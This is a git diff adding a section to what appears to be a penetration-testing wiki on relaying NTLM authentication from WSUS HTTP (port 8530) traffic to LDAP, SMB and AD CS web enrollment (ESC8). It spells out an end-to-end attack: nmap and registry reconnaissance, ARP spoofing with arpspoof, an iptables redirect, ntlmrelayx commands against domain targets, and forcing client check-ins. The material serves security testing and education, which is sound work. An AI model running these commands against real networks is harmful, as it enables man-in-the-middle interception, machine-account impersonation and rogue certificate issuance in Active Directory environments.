diff --git a/src/generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md b/src/generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md index e0945ef75..464eea7e5 100644 --- a/src/generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md +++ b/src/generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md @@ -115,6 +115,67 @@ python MultiRelay.py -t -u ALL -d # Dump hashes These tools and techniques form a comprehensive set for conducting NTLM Relay attacks in various network environments. +### Abusing WSUS HTTP (8530) for NTLM Relay to LDAP/SMB/AD CS (ESC8) + +WSUS clients authenticate to their update server using NTLM over HTTP (8530) or HTTPS (8531). When HTTP is enabled, periodic client check-ins can be coerced or intercepted on the local segment and relayed with ntlmrelayx to LDAP/LDAPS/SMB or AD CS HTTP endpoints (ESC8) without cracking any hashes. This blends into normal update traffic and frequently yields machine-account authentications (HOST$). + +What to look for +- GPO/registry configuration under HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate and ...\WindowsUpdate\AU: + - WUServer (e.g., http://wsus.domain.local:8530) + - WUStatusServer (reporting URL) + - UseWUServer (1 = WSUS; 0 = Microsoft Update) + - DetectionFrequencyEnabled and DetectionFrequency (hours) +- WSUS SOAP endpoints used by clients over HTTP: + - /ClientWebService/client.asmx (approvals) + - /ReportingWebService/reportingwebservice.asmx (status) +- Default ports: 8530/tcp HTTP, 8531/tcp HTTPS + +Reconnaissance +- Unauthenticated + - Scan for listeners: nmap -sSVC -Pn --open -p 8530,8531 -iL + - Sniff HTTP WSUS traffic via L2 MITM and log active clients/endpoints with wsusniff.py (HTTP only unless you can make clients trust your TLS cert). +- Authenticated + - Parse SYSVOL GPOs for WSUS keys with MANSPIDER + regpol (wsuspider.sh wrapper summarises WUServer/WUStatusServer/UseWUServer). + - Query endpoints at scale from hosts (NetExec) or locally: + nxc smb -u -p -M reg-query -o PATH="HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate" KEY="WUServer" + reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate + +End-to-end HTTP relay steps +1) Position for MITM (same L2) so a client resolves the WSUS server to you (ARP/DNS poisoning, Bettercap, mitm6, etc.). Example with arpspoof: + arpspoof -i -t + +2) Redirect port 8530 to your relay listener (optional, convenient): + iptables -t nat -A PREROUTING -p tcp --dport 8530 -j REDIRECT --to-ports 8530 + iptables -t nat -L PREROUTING --line-numbers + +3) Start ntlmrelayx with the HTTP listener (requires Impacket support for HTTP listener; see PRs below): + ntlmrelayx.py -t ldap:// -smb2support -socks --keep-relaying --http-port 8530 + + Other common targets: + - Relay to SMB (if signing off) for exec/dump: -t smb:// + - Relay to LDAPS for directory changes (e.g., RBCD): -t ldaps:// + - Relay to AD CS web enrollment (ESC8) to mint a cert and then authenticate via Schannel/PKINIT: + ntlmrelayx.py --http-port 8530 -t http:///certsrv/certfnsh.asp --adcs --no-http-server + For deeper AD CS abuse paths and tooling, see the AD CS page: + +{{#ref}} +../../windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md +{{#endref}} + +4) Trigger a client check-in or wait for schedule. From a client: + wuauclt.exe /detectnow + or use the Windows Update UI (Check for updates). + +5) Use the authenticated SOCKS sessions (if -socks) or direct relay results for post-exploitation (LDAP changes, SMB ops, or AD CS certificate issuance for later authentication). + +HTTPS constraint (8531) +- Passive interception of WSUS over HTTPS is ineffective unless clients trust your certificate. Without a trusted cert or other TLS break, the NTLM handshake can’t be harvested/relayed from WSUS HTTPS traffic. + +Notes +- WSUS was announced deprecated but remains widely deployed; HTTP (8530) is still common in many environments. +- Useful helpers: wsusniff.py (observe HTTP WSUS check-ins), wsuspider.sh (enumerate WUServer/WUStatusServer from GPOs), NetExec reg-query at scale. +- Impacket restored HTTP listener support for ntlmrelayx in PR #2034 (originally added in PR #913). + ### Force NTLM Logins In Windows you **may be able to force some privileged accounts to authenticate to arbitrary machines**. Read the following page to learn how: @@ -243,6 +304,14 @@ You now own **NT AUTHORITY\SYSTEM**. - [https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/](https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/) - [https://intrinium.com/smb-relay-attack-tutorial/](https://intrinium.com/smb-relay-attack-tutorial/) - [https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html](https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html) +- [WSUS Is SUS: NTLM Relay Attacks in Plain Sight (TrustedSec)](https://trustedsec.com/blog/wsus-is-sus-ntlm-relay-attacks-in-plain-sight) +- [GoSecure – Abusing WSUS to enable NTLM relaying attacks](https://gosecure.ai/blog/2021/11/22/gosecure-investigates-abusing-windows-server-update-services-wsus-to-enable-ntlm-relaying-attacks) +- [Impacket PR #2034 – Restore HTTP server in ntlmrelayx](https://github.com/fortra/impacket/pull/2034) +- [Impacket PR #913 – HTTP relay support](https://github.com/fortra/impacket/pull/913) +- [WSUScripts – wsusniff.py](https://github.com/Coontzy1/WSUScripts/blob/main/wsusniff.py) +- [WSUScripts – wsuspider.sh](https://github.com/Coontzy1/WSUScripts/blob/main/wsuspider.sh) +- [MS-WSUSOD – Windows Server Update Services: Server-to-Client Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-wsusod/e00a5e81-c600-40d9-96b5-9cab78364416) +- [Microsoft – WSUS deprecation announcement](https://techcommunity.microsoft.com/blog/windows-itpro-blog/windows-server-update-services-wsus-deprecation/4250436) {{#include ../../banners/hacktricks-training.md}}